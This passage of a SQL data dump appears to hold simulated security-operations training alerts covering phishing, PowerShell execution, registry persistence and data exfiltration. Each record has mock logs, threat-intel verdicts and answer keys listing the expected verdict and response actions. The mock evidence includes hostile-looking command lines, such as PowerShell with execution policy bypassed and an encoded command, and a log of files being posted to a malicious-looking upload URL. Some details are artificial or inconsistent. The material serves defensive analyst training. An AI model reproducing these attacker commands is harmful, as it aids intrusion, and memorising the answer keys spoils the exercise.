1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:32:00Z\\\",\\\"event\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"encrypted_project_files.zip\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"exfil_method\\\":\\\"HTTP POST\\\",\\\"destination_url\\\":\\\"http://malicious-domain.com/upload\\\",\\\"associated_user\\\":\\\"jdoe@company.com\\\",\\\"alert_id\\\":\\\"DLP-2023-5678\\\",\\\"indicator_of_compromise\\\":[\\\"IP:203.0.113.45\\\",\\\"HASH:b1946ac92492d2347c6235b4d2611184\\\",\\\"URL:http://malicious-domain.com/upload\\\"]}\"},{\"timestamp\":\"2026-02-01T20:30:22.168Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:32:00Z\\\",\\\"event\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"encrypted_project_files.zip\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"exfil_method\\\":\\\"HTTP POST\\\",\\\"destination_url\\\":\\\"http://malicious-domain.com/upload\\\",\\\"associated_user\\\":\\\"jdoe@company.com\\\",\\\"alert_id\\\":\\\"DLP-2023-5678\\\",\\\"indicator_of_compromise\\\":[\\\"IP:203.0.113.45\\\",\\\"HASH:b1946ac92492d2347c6235b4d2611184\\\",\\\"URL:http://malicious-domain.com/upload\\\"]}\"},{\"timestamp\":\"2026-02-01T20:29:22.168Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:32:00Z\\\",\\\"event\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"encrypted_project_files.zip\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"exfil_method\\\":\\\"HTTP POST\\\",\\\"destination_url\\\":\\\"http://malicious-domain.com/upload\\\",\\\"associated_user\\\":\\\"jdoe@company.com\\\",\\\"alert_id\\\":\\\"DLP-2023-5678\\\",\\\"indicator_of_compromise\\\":[\\\"IP:203.0.113.45\\\",\\\"HASH:b1946ac92492d2347c6235b4d2611184\\\",\\\"URL:http://malicious-domain.com/upload\\\"]}\"},{\"timestamp\":\"2026-02-01T20:28:22.168Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:32:00Z\\\",\\\"event\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"encrypted_project_files.zip\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"exfil_method\\\":\\\"HTTP POST\\\",\\\"destination_url\\\":\\\"http://malicious-domain.com/upload\\\",\\\"associated_user\\\":\\\"jdoe@company.com\\\",\\\"alert_id\\\":\\\"DLP-2023-5678\\\",\\\"indicator_of_compromise\\\":[\\\"IP:203.0.113.45\\\",\\\"HASH:b1946ac92492d2347c6235b4d2611184\\\",\\\"URL:http://malicious-domain.com/upload\\\"]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(546, 'Suspicious Email Attachment Detected', 'high', 'Email Gateway Logs', 'A spear-phishing email containing a malicious attachment was detected targeting key personnel within the organization. The email originated from a known malicious IP address and contained a file with a suspicious hash linked to advanced persistent threat (APT) activities.', 'Initial Access', 'T1566.001', 1, 'resolved', 34, '{\"timestamp\":\"2023-10-15T08:42:00Z\",\"email_subject\":\"Urgent: Review the Attached Document\",\"source_ip\":\"203.0.113.45\",\"destination_email\":\"j.doe@organization.com\",\"attachment_name\":\"Invoice_October2023.docx\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"sender_email\":\"finance@truste-partners.com\",\"recipient_ip\":\"192.168.1.15\"}', '2026-01-07 22:33:18', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash linked to document-based malware used in spear-phishing attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"finance@truste-partners.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Email address not recognized and associated with recent phishing attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Attachment Detected\",\"date\":\"2026-02-01T20:32:22.170Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(547, 'Unauthorized Code Execution Detected', 'critical', 'Endpoint Detection and Response (EDR) System', 'Upon opening the attachment, a sophisticated malware payload is executed, initiating the deployment of espionage modules.', 'Execution', 'T1059.001: Command and Scripting Interpreter: PowerShell', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:32:15Z\",\"event_id\":\"4625\",\"event_source\":\"Microsoft-Windows-Security-Auditing\",\"computer_name\":\"victim-machine.local\",\"user\":{\"domain\":\"victim-domain\",\"name\":\"john.doe\",\"full_name\":\"John Doe\"},\"process\":{\"name\":\"powershell.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\john.doe\\\\Documents\\\\malicious_script.ps1\"},\"network\":{\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443},\"file\":{\"name\":\"malicious_script.ps1\",\"path\":\"C:\\\\Users\\\\john.doe\\\\Documents\\\\malicious_script.ps1\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}}', '2026-01-07 22:33:18', '2026-02-16 18:18:48', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known command and control server for APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used by APT groups.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual script execution 
detected.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"User employed within the organization.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(548, 'Malware Persistence Mechanism Activated', 'high', 'System Registry Logs', 'The malware establishes persistence by modifying registry entries, allowing it to survive system reboots and maintain a foothold within the network. The registry key associated with the malware was altered to execute the malicious binary during startup.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:34Z\",\"event_id\":\"4624\",\"event_source\":\"Microsoft-Windows-Security-Auditing\",\"computer_name\":\"compromised-host.local\",\"user\":\"john.doe\",\"registry_change\":{\"key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"value_name\":\"MaliciousStartup\",\"value_data\":\"C:\\\\Windows\\\\System32\\\\evil.exe\"},\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"external_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.101\"}', '2026-01-07 22:33:18', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware hash associated with APT actors.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP address associated with command and control servers.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"User account used to perform registry 
changes.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.172Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"john.doe\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"MaliciousStartup\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\evil.exe\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.172Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"john.doe\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"MaliciousStartup\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\evil.exe\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.172Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"john.doe\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"MaliciousStartup\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\evil.exe\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.172Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"john.doe\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"MaliciousStartup\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\evil.exe\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.172Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"john.doe\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"MaliciousStartup\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\evil.exe\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(549, 'Anomalous Network Activity Detected', 'high', 'Network Traffic Analysis', 'Advanced lateral movement activity detected, involving Bluetooth sniffing to map and infiltrate additional devices within the local network. The malware is expanding its reach by targeting vulnerable hosts using identified Bluetooth connections.', 'Lateral Movement', 'T1570: Lateral Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"NT-4567\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"10.0.0.25\",\"external_attacker_ip\":\"203.0.113.45\",\"filename\":\"BlueSniff_v2.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"internal_user\",\"bluetooth_device\":\"00:1A:7D:DA:71:11\",\"event_type\":\"lateral_movement\",\"protocol\":\"Bluetooth\",\"description\":\"Detected suspicious Bluetooth activity attempting to discover and access local devices.\",\"action\":\"attempted lateral movement\"}', '2026-01-07 22:33:18', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local network address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local network address\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Public IP\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous attacks\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware used in lateral movement 
attacks\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"BlueSniff_v2.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Executable used for Bluetooth sniffing and lateral movement\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(550, 'Sensitive Data Exfiltration in Progress', 'critical', 'Data Loss Prevention (DLP) Logs', 'The malware has initiated a covert data exfiltration process, leveraging screen capture and audio recording modules to gather intelligence. This activity was detected as sensitive files were being transmitted to an external command and control server.', 'Exfiltration', 'T1041', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-24T14:32:56Z\",\"event_id\":\"DLP-EXFIL-001\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.42\",\"file_name\":\"confidential_project.pptx\",\"file_hash\":\"a1b2c3d4e5f678901234567890abcdef12345678\",\"user\":\"jdoe\",\"process_name\":\"malware_exfil.exe\",\"process_hash\":\"b2c3d4e5f6789012a1b2c3d4e5f6789012345678\",\"protocol\":\"HTTPS\",\"action\":\"File Transfer\",\"detection_method\":\"Screen Capture and Audio Recording Modules\"}', '2026-01-07 22:33:18', '2026-02-16 18:18:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known C2 servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f678901234567890abcdef12345678\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with data exfiltration malware.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b2c3d4e5f6789012a1b2c3d4e5f6789012345678\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware 
executable.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"confidential_project.pptx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Data Loss Prevention\",\"verdict\":\"sensitive\",\"details\":\"File tagged as containing sensitive information.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.175Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:56Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-001\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"file_name\\\":\\\"confidential_project.pptx\\\",\\\"file_hash\\\":\\\"a1b2c3d4e5f678901234567890abcdef12345678\\\",\\\"user\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"malware_exfil.exe\\\",\\\"process_hash\\\":\\\"b2c3d4e5f6789012a1b2c3d4e5f6789012345678\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"detection_method\\\":\\\"Screen Capture and Audio Recording Modules\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.175Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:56Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-001\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"file_name\\\":\\\"confidential_project.pptx\\\",\\\"file_hash\\\":\\\"a1b2c3d4e5f678901234567890abcdef12345678\\\",\\\"user\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"malware_exfil.exe\\\",\\\"process_hash\\\":\\\"b2c3d4e5f6789012a1b2c3d4e5f6789012345678\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"detection_method\\\":\\\"Screen Capture and Audio Recording Modules\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.175Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:56Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-001\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"file_name\\\":\\\"confidential_project.pptx\\\",\\\"file_hash\\\":\\\"a1b2c3d4e5f678901234567890abcdef12345678\\\",\\\"user\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"malware_exfil.exe\\\",\\\"process_hash\\\":\\\"b2c3d4e5f6789012a1b2c3d4e5f6789012345678\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"detection_method\\\":\\\"Screen Capture and Audio Recording Modules\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.175Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:56Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-001\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"file_name\\\":\\\"confidential_project.pptx\\\",\\\"file_hash\\\":\\\"a1b2c3d4e5f678901234567890abcdef12345678\\\",\\\"user\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"malware_exfil.exe\\\",\\\"process_hash\\\":\\\"b2c3d4e5f6789012a1b2c3d4e5f6789012345678\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"detection_method\\\":\\\"Screen Capture and Audio Recording Modules\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.175Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:56Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-001\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"file_name\\\":\\\"confidential_project.pptx\\\",\\\"file_hash\\\":\\\"a1b2c3d4e5f678901234567890abcdef12345678\\\",\\\"user\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"malware_exfil.exe\\\",\\\"process_hash\\\":\\\"b2c3d4e5f6789012a1b2c3d4e5f6789012345678\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"detection_method\\\":\\\"Screen Capture and Audio Recording Modules\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(551, 'Suspicious Initial Access Detected', 'medium', 'Email Gateway Logs', 'A spear-phishing email was detected targeting an engineer\'s workstation. The email contains a malicious attachment likely aimed at compromising the system.', 'Spear Phishing', 'T1566.001 - Spear Phishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T08:45:23Z\",\"email_id\":\"12345abcde\",\"subject\":\"Project Timeline Update\",\"sender\":\"john.doe@trustedsource.com\",\"recipient\":\"engineer@targetcompany.com\",\"attachment_name\":\"Project_Timeline_Update.docx\",\"attachment_hash\":\"3b1d5a9c5e9f6a8d8f0c4e2a7d3f9a5b\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.1.15\",\"action\":\"Delivered\",\"malware_detected\":true,\"malware_name\":\"APT_Equation_Backdoor\"}', '2026-01-07 22:35:14', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal 